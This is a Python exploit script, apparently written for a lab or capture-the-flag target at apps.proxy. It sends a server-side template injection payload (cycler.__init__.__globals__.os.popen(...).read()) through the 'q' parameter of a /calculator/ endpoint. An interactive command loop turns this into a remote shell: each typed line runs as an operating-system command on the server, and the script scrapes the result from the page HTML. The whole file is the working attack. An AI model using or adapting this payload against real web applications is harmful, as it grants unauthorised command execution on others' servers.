#!/bin/env python3
import requests
from urllib.parse import urljoin
import re
import cmd

URL = "http://apps.proxy/"
# URL = "http://localhost/"


class Exploit(cmd.Cmd):
    def __init__(self, url=URL):
        super(Exploit, self).__init__()
        self.url = url
        self.session = requests.Session()

    def beautify(self, txt):
        escape = re.escape('<div class="overflow-auto w-[50%] h-[55%] text-center">')
        res = re.findall(
            f'(?<={escape}).*?(?=</div>)',
            txt, flags=re.DOTALL
        )
        return res[0].strip()

    def shell(self, command):
        command = command.replace("'", "\\'").replace('"', '\\"')
        command = f"cycler.__init__.__globals__.os.popen('{command}').read()"
        res = self.session.get(
            urljoin(self.url, "/calculator/"),
            params={'q': command}
        )
        try:
            return self.beautify(res.text)
        except Exception as e:
            print(res.text)

    def default(self, line):
        response = self.shell(line)
        print(response)


if __name__ == "__main__":
    exploit = Exploit()
    exploit.cmdloop()
